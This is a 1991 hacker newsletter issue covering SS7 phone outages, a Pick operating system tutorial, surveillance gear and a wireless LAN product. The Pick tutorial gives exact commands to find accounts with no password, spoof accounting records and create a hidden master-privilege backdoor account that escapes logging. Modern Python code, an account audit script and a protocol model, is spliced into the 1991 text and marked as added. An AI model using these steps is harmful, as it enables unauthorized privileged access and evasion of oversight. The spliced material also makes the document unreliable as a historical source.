=======================================
T H E   N E W   F O N E   E X P R E S S
=======================================
The newsletter of the Society for the Freedom of Information (SFI)
Electronic Edition
---------------------------------------------------------------------------
The publisher, SFI, distribution site(s), and authors contributing to the NFX
are protected by the Bill of Rights in the U.S. Constitution, which specifically
protects freedom of speech and freedom of the press. The information provided
in this magazine is for informational purposes only, and the publisher, SFI,
distribution site(s) and authors are not responsible for any problems resulting
from the use of this information. Nor is SFI responsible for consequences
resulting from authors' actions. This disclaimer is retroactive to all previous
issues of the NFX.
We accept article submissions of nearly any sort, about hack/phreak/anarchy/
gov't/nets/etc. We will also send the author a free printed issue for each
article written.
The printed edition of the newsletter is finally available for $24 (U.S.) per
year, until we find a cheaper way to reproduce it on paper. Articles may also
be submitted to this address. Send mail to the New Fone Express, Box 639,
15405 Michigan Rd., Woodbridge, VA 22191.
---------------------------------------------------------------------------
Highlights for Issue #3/August 1991
===================================
* Phones Take Lunch Break ... typed by Silicon Avalanche, edited
(see article #1)
* SUPPLEMENT: What Happened?
* A Pick Tutorial pt.2 ... by Silicon Avalanche
(see article #2)
* State of Surveillance pt.3 ... by the Cavalier
(see article #3)
* Altair Wireless LANs ... by the Cavalier
(see article #4)
* Corrections ... edited
(see article #5)
* Editorial and Bell IS News ... by the Cavalier
(see article #6)
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Phones Take Lunch Break
... Computer Failure Disables Pa. Phones...
... Outage Linked to Problem That Hit Here ...
... by Cindy Skrzycki and Evelyn Richards ...
... Washington Post Staff Writers ...
Telephone service in Pittsburgh and other parts of Pennsylvania was
paralyzed yesterday (7/1/91) by the same sort of massive computer software
failure that knocked phones out in the Washington area only four days ago
(6/29/91).
The outage in Pittsburgh interfered with service to about 1 million
customers, or about one-third of the state, beginning just after 11 a.m.
Service was restored by 5:15 p.m.
Later yesterday (7/1/91), service was disrupted for several minutes in
San Francisco, which telephone company officials attributed to the same
problem.
The failures in Pennsylvania happened just as Bell Atlantic Corp., the
parent company of both Chesapeake & Potomac Telephone Cos. and Bell of
Pennsylvania, was trying to reach some conclusion on the cause of the
disruption in Washington, which was probably the most massive collapse in
local phone service ever.
The Pennsylvania problem was the third major disruption to hit a
metropolitan area in less than a week. Last Wednesday, Los Angeles lost phone
service for much of the same time that some 6.3 million lines were out in
four states served by C&P.
Each of the problems, which have telecommunications experts scrambling
for explanations, is linked to the same type of computer switch and software
that allows phone companies to offer sophisticated services such as Caller
ID. The switch and software are manufactured by DSC Communications Corp. of
Plano Tex., (214)519-3000, the largest supplier of such equipment.
The rash of software-related disruptions confirms the predictions of many
telecommunications experts that outages will recur because of the complexity
of the new technology.
Customers in Pennsylvania, as in Washington, found when the outage hit
that they had difficulty calling across town and making toll calls to nearby
exchanges.
Dessi Plutis, who lives in Pittsburgh, ran up against the problem when
she tried to make a call across town. "The line was busy, busy, busy,"
Plutis said. "I assumed they took the phone off the hook."
What really was happening was a near replication of a major software
glitch that hit in the Washington area last Wednesday around the same time of
day. In that case, a complex computer switching system called Signaling
System 7 broke down in Baltimore and quickly affected three other computer
switches that route and set up calls for the Washington area. The computers
went into overload and shut down after reacting to a flood of maintenance
messages in the system. These messages tell computers in the telephone
network that some congestion, real or imagined, or some other problem is
being experienced.
The flood of these messages prevents other calls from going through. In
Pennsylvania, an overload of maintenance messages between two Signaling
System 7 computers also seems to be the culprit. "When it overloaded, it
backed up to the other one," said Eric Rabe, spokesman for Bell of
Pennsylvania.
What experts find most intriguing is the fact that all of the problems
seem to be traceable to the software supplied by DSC. The company recently
completed shipment on its hundredth Signaling System 7 switch and counts
among its major customers the regional telephone companies and long-distance
carriers such as MCI Communications Corp. and US Sprint Communications Co.
A spokesman for DSC said Signaling System 7 is "the leading product in
the industry. It has run flawlessly for a number of years. We still don't
know that it isn't."
The spokesman said the computer did what it was supposed to do - shut
down when it's overloaded. He said approximately 200 people are working
"around the clock" to prevent a recurrence of the outages, and phone
companies have been sensitized for what conditions to watch for, as well as
how to isolate, stabilize and restore service.
"We know the symptoms. We don't know the cause," the DSC spokesman said.
The outages on the Eastern seaboard present a major image and reliability
problem for Bell Atlantic. All told, the company has had major problems in
five of the seven states it serves in the last week. "Obviously, [the
breakdown] doesn't help us, but... I hope we've built up a lot of years of
understanding that quality is the name of the game," said Anton J.
Campanella, president of Bell Atlantic. "We are not going to rest until we
find the answer to this one." Bell Atlantic said it is working closely with
DSC and that the switch manufacturer has provided software "patches" to
prevent the problem from recurring by shutting down maintenance messages.
But the company clearly is worried that some element of Signaling System 7
may somehow be inherently flawed. "My tummy gets upset when a manufacturer
delivers a product that doesn't work correctly," said Campanella, though he
stressed that the problem hasn't been identified. He also said that a virus
is not being ruled out since all of the occurrences in the Bell Atlantic
network seemed to start around the same time of day. The company has been in
contact with the FBI to follow up on that possibility.
Pacific Bell, whose problems began on June 10, also has been in close
touch with DSC. "We were entirely unhappy with what happened June 10," said
Sue Galloway, regional switching manager for Pacific Bell's Southern
California network operations. "Even though analysis was going on, we were
concerned and we wanted to send a very clear message." The company was so
concerned that Pacific Bell called in DSC's chairman to meet with top
telephone officials in northern California, a Pacific Bell official said. In
San Francisco, a computer began spitting out congestion messages about 11
a.m. Pacific time. Traffic was rerouted and service was restored. The outage
in Pennsylvania also caused officials at C&P to rethink an announcement
yesterday about how customers in the Washington region might be compensated
for their troubles last Wednesday. "It may be premature to make any kind of
announcement," said Michael Daley, spokesman for C&P in the District. "We'll
talk about what we can do for customers when we get over the hurdles of these
phone outages."
... Staff writer John Burgess contributed to this report ...
... Courtesy of Silicon Avalanche of SFI ...
... from The Washington Post, July 2, 1991, pgs. D1 and D4. ... ><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
What Happened?
As far as we could guess, the common denominator in all these cases was
a switch that was processing a large number of calls. Due to SS7's
capability to pass network traffic off to other switches, it tried to do so,
but ended up passing an overload message instead. The second switch then
decided that it wanted to be overloaded, and it cascaded through the local
network of CCS7-connected switches, thereby locking up the entire SS7-capable
network. DSC Communications eventually turned out to be the culprit -
another bug in the SS7 software, which was written by the DSC people. We've
been told that this is not exactly what happened with the AT&T network crash
on Jan. 15, 1990, however: apparently AT&T writes their own STP (signaling
transfer point, a module that allows switches to run SS7) software. We would
venture a guess that DSC is a vendor of STPs - and a popular one at that. ><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
A Pick Tutorial
A Pick Tutorial - Courtesy of Silicon Avalanche of SFI
Installment #2
TICKLE, TICKLE...
Well, by now you should have some means of getting in and out of some
account on a Pick system, whether it be the TUTOR account, or some other
system account. The best place to be is at what is called TCL (pronounced
"tickle"), short for 'T'erminal 'C'ommand 'L'evel. This is the main command
level, Pick's version of Direct Mode. If you're not there, and you're at a
menu or some other place, try "Q", "X", "", and other such options, to
see which of them may work. Try sending a character, or -"C",
this should take you to either the Pick/Basic Debugger or the System
Debugger. If this is the case, you should be taken to a prompt similar to:
I502 or 274.263
* !
at the prompt, enter
END
and hopefully you'll be at TCL. Worst case, you'll be back at the menu you
just left. If this is the case, find the way to logoff, and find a new
account to use. You've hit a dead end on this one.
WHAT CAN I DO NOW?
Command / Function & Output
-----------------------------------------------------------------------------
LISTFILES / Lists the files available from the account you're in
WHO / Tells you what account and port # you're logged onto
LISTU / Lists the other users on the system and the accounts
/ they're logged onto
TIME / Gives the system time
DATE / Gives the system date
LIST GAMES / On many systems, lists a file of games to play
LOGON / Log another port onto a specified account
LOGOFF / Log another port off
LOGTO acct / Change accounts from the current one to 'acct'
-----------------------------------------------------------------------------
More Interesting Commands:
LIST ONLY SYSTEM
Lists all valid accounts on the system
LIST ONLY SYSTEM WITH *A7 = ""
Lists all valid accounts on the system that have NO PASSWORD
CHARGE-TO acctname
Makes the system record think you are logged onto another account
(acctname). Confusing to explain, but a good thing to do if you're
hacking..
-----------------------------------------------------------------------------
** The PICK Glossary has been dropped from this installment of A Pick
Tutorial in the name of brevity. It will be printed in a later installment.
**
-----------------------------------------------------------------------------
HOW DO I MAKE MY OWN ACCOUNT?
By using the following process, you will create a system-level account that
has the same privileges as SYSPROG, the master account on the system.
From the TCL prompt, type
ED SYSTEM acctname
where acctname is the name of the account that you want to create to use for
access at a later date. The system will respond with something like:
NEW ITEM
TOP
.
and the cursor will be positioned to the right of the '.'. Now type
I
and the computer will respond with
001+
and will await entry of the lines of information. Type the following EXACTLY
AS IT IS WRITTEN!
Q
SYSPROG
.
.
.
.
.
SYS2
L
10
F
RU99/.//
FI
Now you will be back at the TCL prompt. Your account is now created. Type
LOGTO acctname
where acctname is the name of the account you just made, and you will be in
your new account. If you want to put a password on your new account, type
PASSWORD
and you'll be prompted for the account name and password you wish to use.
Enter this information, and when prompted for the next account name, hit
and you'll return to the TCL prompt. Passwords can be any length,
comprised of virtually any characters, including control codes, as stated in
installment #1 of the Pick Tutorial.
WHAT NOW?
Play around in your new account, see what things do, take as much time as you
like. The system does not record logon/logoff or on-line times for this
account, because it was not created to track such things. Since this is the
case, the only way that your account will be noticed is if someone looks at
the SYSTEM file to see all the accounts on the system.
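Since a review of the SYSTEM file is the one place such an account shows up, that review can be automated. The following is an added example, not part of the original tutorial: it audits an exported copy of the SYSTEM file against an approved account list. The export format (one item per line, '^' standing in for the attribute mark), the account names and the approved list are constructed assumptions.

```python
"""Audit an exported copy of a Pick SYSTEM file against an approved account list."""
from dataclasses import dataclass, field

AM = "^"  # assumed stand-in for the attribute mark in the exported text

# Constructed sample export: item-id, then attributes 1..10. Not from a real system.
SAMPLE_DUMP = """\
SYSPROG^D^1234^1^^^^A1B2C3D4^SYS2^L^10
ACCOUNTING^D^5678^7^^^^99FF00AA^SYS1^L^10
TUTOR^D^9012^3^^^^^SYS0^L^10
NIGHTOPS^Q^SYSPROG^^^^^^SYS2^L^10
"""
APPROVED = {"SYSPROG", "ACCOUNTING", "TUTOR"}  # constructed baseline


@dataclass
class Finding:
    account: str
    reasons: list = field(default_factory=list)


def parse_items(dump):
    """Return {item-id: [attr1, attr2, ...]} from the exported text."""
    items = {}
    for line in dump.splitlines():
        if line.strip():
            item_id, *attrs = line.split(AM)
            items[item_id.strip()] = attrs
    return items


def attr(attrs, n):
    """Attribute n, numbered from 1 as Pick does; '' when the item is shorter."""
    return attrs[n - 1].strip() if len(attrs) >= n else ""


def audit(dump, approved, master="SYSPROG"):
    """Flag items that a reviewer of the SYSTEM file should look at."""
    findings = []
    for name, attrs in parse_items(dump).items():
        reasons = []
        if name not in approved:
            reasons.append("not in approved baseline")
        # Attribute 1 = Q with attribute 2 naming the master account is the
        # item shape the tutorial enters for its new account.
        if name != master and attr(attrs, 1) == "Q" and attr(attrs, 2) == master:
            reasons.append("synonym of master account " + master)
        # Same test as the tutorial's  LIST ONLY SYSTEM WITH *A7 = ""
        if attr(attrs, 7) == "":
            reasons.append("empty password attribute (A7)")
        if reasons:
            findings.append(Finding(name, reasons))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_DUMP, APPROVED):
        print(f"{f.account}: {'; '.join(f.reasons)}")
```

Run on a schedule against a fresh export, any account outside the baseline is reported on the next pass, whether or not the system keeps logon records for it.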
WHAT'S NEXT?
The next installment of The Pick Tutorial will contain information on a
simple Pick Virus, and other methods of wreaking havoc on the system. (For
the benevolent ones of you, this will still be useful information.)
><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
State of Surveillance pt.3
This third installment covers video bugs. First off, we'll start with
the video camera. Since walking around pointing shoulder-held video cameras
at people tends to be somewhat obvious, companies have made cameras that are
the size of matchboxes, being somewhere around an inch and a half square.
This is, of course, without power supply or tape. A neat trick for observing
people in rooms is to run a fiber optic cable through a lens or two to the
camera, and to run the other end through a pinhole in the wall. In this way,
the light from the room will enter the fiber optic cable and be recorded on
the other end by a camera, conveniently out of sight on the other side of the
wall. I've also been told about a fake car antenna that has a similar
pinhole and fiber optic assembly leading down to a camera and transmitter
under the antenna. The antenna rotates and sends a video image to a
briefcase with a receiver and a TV screen. It's supposedly used for
stakeouts. Through fiber optics, one can mount the actual camera almost
anywhere.
Another type of 'video bug,' in a way, is night-vision. There are two
major commercial approaches to night vision: infrared and image
amplification. Infrared vision can be accomplished in one of two ways:
active or passive. Active infrared vision consists of an infrared flashlight
and a camera or goggles that are sensitive to infrared light. The subjects
never know they're being watched, unless they have an infrared-sensitive
device. The best way to detect if you are being watched by an active
infrared camera is to buy an infrared detector card used for testing remote
controls, such as Radio Shack sells for $6.95. Assuming this will be done in
the dark, the card should fluoresce when hit by strong infrared light.
Passive infrared vision is a little bit more tricky. This type of
vision doesn't depend on an infrared light source; therefore, it is a lot
harder to detect. This system detects the differences in the amount of heat
given off by objects and translates it into a video image. As a side
benefit, these systems can be so sensitive that they can detect a handprint
up to five minutes after the subject has left, simply because of the heat
difference. Passive infrared can't be detected by the above-mentioned card.
Image amplification is a technique used for amplifying the amount of
visible light incident on the goggles and turning it into a video image.
Along with passive infrared vision, image amplification is another technique
the United States military uses. As a matter of fact, image amplification
was used extensively in the so-called 'Desert Storm conflict,' by forward
scouts who needed to see in the dark.
Another meaning of 'video bug' can be applied to TEMPEST equipment, or
what is sometimes called Van Eck phreaking. Video screens, computers,
'intelligent' keyboards (like those found on IBM/IBM compatibles) all send
out immense amounts of what most people regard as RF interference. However,
with the proper equipment, these signals can be picked up and read from as
far as one kilometer away. The defense against this, of course, is to shield
your computer from this type of emission. A few years ago, GRiD Inc. (now
part of Tandy) sold some TEMPEST-shielded computer equipment to the
Government, so you may wish to contact them.
The next installment will cover miscellaneous other counter-surveillance
and personal-protection type items, and will supposedly be the last. ><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Altair Wireless LANs
The Altair wireless LAN system (or the Altair Wireless In-Building
Network, or WIN for short, as Motorola likes to say) is probably the most
technologically-advanced wireless LAN system on the market. The major
difference between the Altair network and other competing wireless products
is that the Altair uses the 18-GHz DTS band to transmit, allowing speeds as
fast as 15 MBps. Since Ethernet's top speed is 10 MBps, the Altair WIN
should easily be able to handle the amount of communication. Also, since the
DTS band is quite uncrowded, the LAN doesn't have to deal with as much
interference as wireless LANs that operate in the UHF band. Since that band
is also allocated to cellular phones, television, FM radio, and 'high-
performance' walkie-talkies, they also need to use spread-spectrum
transmission. Simply put, this type of transmission will limit the bandwidth
to 1.5 - 2 MBps, far too slow for true Ethernet. Infrared LANs only work
when the computers in general share a 'common ceiling,' quite literally.
Most infrared LANs consist of modules aimed at the ceiling. In this way,
the light should bounce off the ceiling and down to another computer. This
technology has serious problems when the surface in question is textured or
non-flat in any way.
A typical Altair LAN consists of one Control Module, or CM, and one or
more User Modules, or UMs, per microcell. One CM can have up to 32 Ethernet
devices in a microcell, and each UM can be hooked up to a maximum of six
Ethernet devices (i.e. workstations, printers, etc.). Data security is
exceptional, for three reasons. The first is the frequency at which the data
is transmitted. The 18 GHz frequency area is extremely hard to pick up
without large, high-priced, ultra-sensitive microwave detection equipment
(incidentally, similar to that used to pick up monitor and computer emissions
- see "State of Surveillance pt.3," elsewhere in the issue). Signals in this
range of the spectrum act like light in that they partially reflect off
surfaces, and like radio in that they penetrate non-structural walls (i.e.
drywall, and walls that aren't thick concrete, etc.) Because the signal
reflects, multipath distortion (similar to that experienced with 'ghosting'
on a TV set) would effectively scramble the signals beyond recognition. Not
to mention, since the maximum output power is 25 mW, this equipment would
have to be positioned very close to the microcell itself. For this reason,
one can have another Altair microcell operating independently as close as 200
feet away.
A second reason is that the network automatically scrambles data sent
between the CMs and UMs. Each UM has a specific scrambling code, similar to
an address. This 16-bit code can have one of 65,535 possible values, and is
in addition to the slot-assigned 10-bit 1024-combination code, which is
changed every time data is sent between modules.
The third reason is that the network supervisor can enter a list of 12-
digit UM Ethernet addresses from all of the UMs that are supposed to be in
the network. The CM will then ignore any UM whose registration number is not
on the list. The UM can then neither transmit nor receive data, since both
operations must be verified by the CM by a slot assignment before they take
place.
The protocol used is a variant on the 'slotted Aloha' protocol: for
every transaction, the UM requests a transmission slot from the CM. When the
CM has verified that the UM should exist on the network, the CM executes the
request, scrambling per both the 10-bit conversation code and the 16-bit UM
ID code. The actual transmission protocol is built into a VLSI ASIC chip,
which uses four-level frequency-shift keying (similar to that of 2400 and
9600 baud modems, which split the signal across four 600 or 2400 bps
segments) and handles miscellaneous network functions. Since the network is
packet-switched, it also handles CRC checksums and CSMA functions, providing
a bit error rate of 10 to the negative eighth power (according to Motorola).
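The slot-request gate described in the last three paragraphs, as an added example that is not Motorola's code or protocol specification: a small model in which the CM grants slots only to listed UM addresses and draws a fresh 10-bit code for each transmission. The XOR scrambler, the grant message carrying the slot code, and all addresses and codes are assumptions made for illustration.

```python
"""Toy model of the CM/UM slot request described above (assumptions labelled)."""
import secrets

SLOT_CODE_BITS = 10  # per-transmission code size, from the article


def scramble(data, um_code, slot_code):
    """Hypothetical scrambler: XOR with an xorshift32 stream seeded by both codes.
    Applying it twice with the same codes restores the data."""
    state = ((um_code << SLOT_CODE_BITS) | slot_code) or 1  # xorshift needs non-zero
    out = bytearray()
    for byte in data:
        state ^= (state << 13) & 0xFFFFFFFF
        state ^= state >> 17
        state ^= (state << 5) & 0xFFFFFFFF
        out.append(byte ^ (state & 0xFF))
    return bytes(out)


class ControlModule:
    def __init__(self, registered):
        # registered: {12-digit UM Ethernet address: 16-bit UM scrambling code}
        self.registered = dict(registered)
        self.slots = {}    # slot number -> (UM address, 10-bit slot code)
        self.ignored = []  # addresses that asked for a slot but are not listed
        self._next_slot = 0

    def request_slot(self, um_addr):
        """Grant (slot, slot_code) to a listed UM; ignore anyone else."""
        if um_addr not in self.registered:
            self.ignored.append(um_addr)
            return None
        slot, self._next_slot = self._next_slot, self._next_slot + 1
        slot_code = secrets.randbelow(1 << SLOT_CODE_BITS)  # new code every time
        self.slots[slot] = (um_addr, slot_code)
        return slot, slot_code

    def receive(self, slot, frame):
        """Descramble a frame sent in a granted slot; each slot is single use."""
        entry = self.slots.pop(slot, None)
        if entry is None:
            return None  # no slot assignment, so the frame is not processed
        um_addr, slot_code = entry
        return um_addr, scramble(frame, self.registered[um_addr], slot_code)


class UserModule:
    def __init__(self, addr, um_code):
        self.addr, self.um_code = addr, um_code

    def send(self, cm, payload):
        grant = cm.request_slot(self.addr)
        if grant is None:
            return None  # the CM ignored the request; nothing is transmitted
        slot, slot_code = grant
        return cm.receive(slot, scramble(payload, self.um_code, slot_code))


if __name__ == "__main__":
    cm = ControlModule({"0800070A1B2C": 0xBEEF})         # constructed values
    print(UserModule("0800070A1B2C", 0xBEEF).send(cm, b"hello"))
    print(UserModule("080007FFFFFF", 0x1234).send(cm, b"hello"), cm.ignored)
```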
The ICs that actually transmit and receive the information are five GaAs
(gallium arsenide) chips, hooked up to a six-sector antenna. At the
beginning of each transmission, the system sweeps through each combination of
antennae for transmission and reception, 36 in all. Each antenna occupies a
60-degree arc, so when an obstacle is placed in the path of a transmission
the system automatically reconfigures the antenna network for a better path.
The system's operating frequencies are the 18.820-18.870 GHz band and the
19.160-19.210 GHz band, both licensed from the FCC under the DTS (Digital
Termination Service) designation and well into the microwave range.
The Altair WIN will most probably be the wireless LAN technology of the
'90s. Using the Altair system, a business can have a microcell on each
floor, with the CMs connected through an Ethernet backbone. The security of
the LAN is so bulletproof that it would be a lot easier to try to hack into
the LAN itself, and businesses will appreciate this. For more information,
contact Motorola's Altair division. ><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Corrections
Silicon Avalanche's handle IS Silicon Avalanche, not "Silicon Lightning"
as misprinted in NFX #2. ><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Editorial
Right before we went to press, it was just announced that the Baby Bell
RBOCs have just been allowed to enter the information services business,
under pressure from the Dept. of Justice and the FCC. Judge Greene (the
judge presiding over the breakup of AT&T in 1982) made the ruling apparently
against his will, but he did leave a block of time to allow appeals.
Well here we are at the end of the third issue... By the way,
sorry about putting the above piece of news in the editorial, but I
couldn't find anywhere else to... There is now a way to subscribe to the New
Fone Express, or to send articles, if you want - see the header. Also, to
download the NFX, there is now an account on Secret Society (see the header
on this one, too).. And by the way, no, I'm not the sysop -- the sysop is
Grim, and he's been a great help in getting the NFX out. [Thanks!]
This one is a little smaller than #2.. we didn't get in that many
articles this time around, but that's probably because it's July... I barely
even had time to do much either, but I think this one is still better than
the first. I'm saving up a lot of the information for a big
Trendwatch column for NFX #4.. I didn't have too much this time around, so I
figured it would be better to put it all in a combined one.
During a trip to Canada, it was somewhat amusing to visit the Bell
Canada building in Toronto -- they were so proud of their Northern Telecom
SL-1 switch, they had it on display behind plexiglas in the lobby!.. A little
farther out, we ran into more party lines than we knew what to do with, and
we promptly kicked ourselves for not bringing some sort of.. tone-generating
device, that's it!... Oh well..
BTW, Dr. Logic -- I haven't forgotten you, I'll get back to you ASAP if
I haven't already by the time you see this..
And I think that will just about wrap this issue up. Until next
time. ><